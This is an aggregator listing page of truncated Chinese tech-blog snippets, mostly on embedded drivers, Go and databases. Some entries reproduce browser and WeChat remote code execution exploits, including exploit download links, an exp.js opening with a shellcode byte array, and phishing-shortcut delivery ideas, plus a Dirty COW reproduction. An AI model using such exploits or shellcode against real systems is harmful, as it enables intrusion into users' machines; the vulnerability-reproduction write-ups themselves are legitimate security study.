ICode9

精准搜索请尝试: 精确搜索
  • 使用golang解析rtp成H264裸码流2021-04-25 10:29:46

    func UnpackRTP2H264(rtpPayload []byte) []byte {     if len(rtpPayload) <= 0 {         return nil     }       var out []byte     fu_indicator := rtpPayload[0]                           //获取第

  • 内存问题探微2021-04-24 16:57:58

    这篇文章是我在公司 TechDay 上分享的内容的文字实录版,本来不想写这么一篇冗长的文章,因为有不少的同学问是否能写一篇相关的文字版,本来没有的也就有了。 说起来这是我第二次在 TechDay 上做的分享,四年前第一届 TechDay 不知天高地厚,上去讲了一个《MySQL 最佳实践》,现在想起来那

  • 6*12ASCII纵向取模数组2021-04-24 15:59:16

    如题 一般在LCD12864上使用的ASCII尺寸都是8*16,但是这样只能写4行,如果要写5行的话,就需要将字模取小一些。修改了字模大小之后,相应的写LCD驱动也需要作一些更改。 // ------------------ ASCII字模的数据表 ------------------------ // // --------------------------------

  • CVE-2020-6418-chrome无沙箱RCE2021-04-18 16:34:05

    目录1. 漏洞简介1.1 影响范围1.2 利用条件2. 复现2.1 弹记事本2.2 msf上线3. 实战利用场景3.1 快捷方式钓鱼[点击上线]3.2 结合无沙盒启动chrome的应用[点击上线]3.3 反制爬虫4. 参考 1. 漏洞简介 2月25日,谷歌Chrome浏览器与微软Edge浏览器发布了安全更新,在Google Chrome浏览器80.

  • Google Chrome 0day 远程代码执行漏洞复现2021-04-18 16:31:50

    Chrome 及 EXP下载:https://wwi.lanzous.com/iPg0ko8xmjg 1.环境win10、win7均可 2.关闭沙箱模式-no-sandbox 3.chrome客户端需64位(Google Chrome < = 89.0.4389.114) 使用命令关闭沙箱模式chrome.exe --no-sandbox Poc:https://github.com/r4j0x00/exploits/tree/master/chrom

  • 【BBED】 SYSTEM文件头损坏的恢复(4)2021-04-18 12:08:00

    【BBED】 SYSTEM文件头损坏的恢复 一.1  BLOG文档结构图  一.2  前言部分 一.2.1  导读和注意事项各位技术爱好者,看完本文后,你可以掌握如下的技能,也可以学到一些其它你所不知道的知识,~O(∩_∩)O~:① BBED恢复SYSTEM文件头② BBED查看文件头的信息   Tips:       ① 若

  • 微信远程代码执行漏洞-亲测已上线2021-04-17 21:01:32

    目录 POC: index.html exp.js POC: index.html <script src="exp.js"></script> exp.js ENABLE_LOG = true; IN_WORKER = true; // run calc and hang in a loop var shellcode = [,0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,

  • 【CVE复现NO.00001】“脏牛”漏洞CVE-2016-5195复现及简要分析2021-04-16 23:06:29

    【CVE复现NO.00001】CVE-2016-5195复现及简要分析 [github blog addr](https://arttnba3.cn/2021/04/08/NOTE-0X04-CVE-2016-5195/)0x00.一切开始之前一、写时复制机制(Copy-on-Write)basic COWmmap 与 COW 二、缺页异常(page fault)分类①软性缺页异常(soft page fault)②硬性缺

  • golang简单实现netbios远程查询机器名字2021-04-15 03:02:30

    package main import ( "fmt" "net" ) func main() { // 创建连接 socket, err := net.DialUDP("udp4", nil, &net.UDPAddr{ IP: net.IPv4(192, 168, 125, 68), Port: 137, }) if err != nil { fmt.Println("连接失败!",

  • STM32硬件CRC计算CRC82021-04-13 13:33:44

    最重要收获:了解到同一个寄存器按字节,半字和字访问的区别。同一个内存寄存器地址,强转为volitale uint8_t *类型,volitale uint16_t *类型和volitale uint32_t *类型时,若其支持按字节,半字和字访问时,这三个类型写入的结果对CPU来说是不一致的。感觉支持多类型访问的寄存器,写入低字节

  • 使用 Shell 调试 I2C 设备2021-04-11 13:36:05

    概述 板:hi3516ev200 oled:连接I2C2,Pin30(i2c2_scl),Pin31(i2c2_sda) 寄存器 Pin I2C2_SCL IO Config Register 地址0x112C003C,默认值0x1C00,当bit[3:0]为0x01时使用i2c功能。 Pin I2C2_SDA IO Config Register 地址0x112C0038,默认值0x1C00,当bit[3:0]为0x01时使用i2c功能。 功能配置 配

  • esp32驱动SPI-TFTLCD2021-04-10 19:03:15

    这篇文章讲一下使用ESP32驱动SPI-TFTLCD 说明:这里直接贴出源代码,这个代码肯定是在别的地方找不到的,因为是我根据官方的STM32驱动TFT的代码硬改过来的,工作量也比较大,驱动代码也比较长,这里其实底层原理就是利用ESP32驱动IO模拟SPI,执行向屏幕内的命令寄存器写值,写入显示数据的过

  • 【BBED】 SYSTEM文件头损坏的恢复(4)2021-04-10 12:57:21

    【BBED】 SYSTEM文件头损坏的恢复 一.1  BLOG文档结构图  一.2  前言部分 一.2.1  导读和注意事项各位技术爱好者,看完本文后,你可以掌握如下的技能,也可以学到一些其它你所不知道的知识,~O(∩_∩)O~:① BBED恢复SYSTEM文件头② BBED查看文件头的信息   Tips:       ① 若

  • 树莓派pico使用MicroPython驱动oled屏显示中文和英文2021-04-08 17:01:47

    文章目录 树莓派pico使用MicroPython驱动oled屏显示中文和英文介绍硬件连接示例显示英文字符显示汉字 树莓派pico使用MicroPython驱动oled屏显示中文和英文 本文博客链接:http://blog.csdn.net/jdh99,作者:jdh,转载请注明. 欢迎前往社区交流:海萤物联网社区 介绍 esp32

  • 【BBED】 SYSTEM文件头损坏的恢复(4)2021-04-08 11:57:30

    一.1  BLOG文档结构图  一.2  前言部分 一.2.1  导读和注意事项各位技术爱好者,看完本文后,你可以掌握如下的技能,也可以学到一些其它你所不知道的知识,~O(∩_∩)O~:① BBED恢复SYSTEM文件头② BBED查看文件头的信息   Tips:       ① 若文章代码格式有错乱,推荐使用Q

  • DSP28系列—驱动六轴MPU6050输出欧拉角2021-04-06 22:30:23

    写在前面的话:如果你和我都是DSP小白的话,我希望你可以沉下心慢慢消化下面的内容,对于模块的学习,你得会软件模拟I2C,配置SCI模块,通用IO口等。 一.MPU6050介绍 1.MPU6050与陀螺仪、加速度计的关系: MPU6050是InvenSense公司推出的一款全球首款的整合性9轴运动处理传感器,其最大的特

  • c语言 将byte转化为二进制数值计算 2021.4.72021-04-05 14:36:02

    BYTE bytes1[4] = {0x00,0x10,0x40,0x00};    //创建4字节的字节数组  注意:字节是逆序的 BYTE bytes2[4] = {0x05,0x20,0x40,0x00};     DWORD b1 = *(DWORD *)bytes1;        //先将bytes1转化成(DWORD *)的指针  再用取值符 * 获得四个字节的值 DWORD b2 = *(DWORD

  • ST77903 QSPI + STM32H750 + RTThread + LVGL(二)2021-04-04 20:01:27

    ST77903 QSPI + STM32H750 + RTThread + LVGL(二) 这一章节我们来完成ST77903的底层驱动 前言 到手的资料,就是一份ST77903 datasheet,几页timing ppt,一块显示屏,全新的lcd驱动方式,没有任何可参考的源代码,所以我们从一穷二白开始,边调试边搭建驱动框架。 ST77903支持单线指令和4

  • 算法竞赛进阶指南 0x00 简化版2021-04-02 15:02:39

    算法竞赛进阶指南 0x00 简化版 0x01 位运算 就几种位运算符,没别的 与 或 非 异或 左移 右移 & | ~ ^ << >> 我们都知道,计算机只能存储2进制数,例如7,在2进制下就是111 。4就是100 & 例如 1111&1011=1011 再例如 01101&100=100 也就是1&1=1 1&0=0 0&1=1 0&

  • 1.3寸IIC OLED SSD1106控制的oled显示问题解决方案2021-04-01 17:34:36

    1.3寸IIC OLED SSD1106 控制的oled显示问题解决方案 首先鸣谢:电子发烧友论坛帖子 在使用1.3寸IIC OLED SSD1106屏幕作为oled显示是,难免会碰到一些问题 问题最常见的,最右侧白边问题。 在使用Arduino开发环境下使用SH1106库驱动,那么则是:SH1106Wire.h 引脚定义和地址: co

  • Adafruit_SSD1306库学习2021-04-01 16:03:17

    Adafruit_SSD1306库学习 原文链接:观感较好:https://blog.csdn.net/qq_41477556/article/details/112311181 文章目录 1.前言 2.SSD1306显示器介绍 3.库方法介绍 3.1.初始化构造器 *(声明OLED显示器)* 3.2 OLED初始化方法 3.2.1 begin方法 3.2.2 clearDisplay ------清屏 3.2.3 disp

  • 数组判断全零的一些代码研究2021-03-31 19:36:16

    最精简版本 int check_data(int *array, int n) { while(n--) if (*array++ != 0x00) return 0; return 1; } 返回1 array数组全零,否则正常非全零。 int check_data(int *array) { while(*array++ !=

  • 红外遥控模块的使用方法,以及stm32代码2021-03-29 14:59:33

    我使用的模块是stm32F103R8T6,配合STM32CudeMX实现的红外遥控串口通讯 一、 红外编码 1、实物设备 发射管(在遥控器上面): 接收管(和主控芯片具有定时器输入捕获功能的I/O引脚连接在一起): 遥控器: 2、基本原理 调制:将数据能够发送的更远,并且数据的损耗在合理范围,大致过程如下的1–

  • 51中程序存储器和数据存储器2021-03-27 15:04:53

    一、单片机中存储器结构 哈弗结构:程序空间与数据空间是分开的 冯诺依曼结构:程序空间与数据空间统一编址 二、ROM,RAM ROM程序存储器: 先了解基本储存器容量关系 1k=1024B( byte)=4096b( bit) RAM数据存储器 data:0x00-0x7f128个ram可以用a寄存器直接读写,速度最快生成代码最

  • [BUUCTF]Reverse——findKey2021-03-23 11:01:22

    findKey 例行检查,32位程序,c++写的 运行一下,没什么特别提示的地方 32位ida载入,检索字符串发现flag提示,跟进跳转 会发现中间有一段汇编没有转换成成函数,选中这部分,按p转换成函数,在按f5就能得到关键代码理一下,贴一下关键代码,这一段应该是计算flag的代码, 根据sub_401005中有md5

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有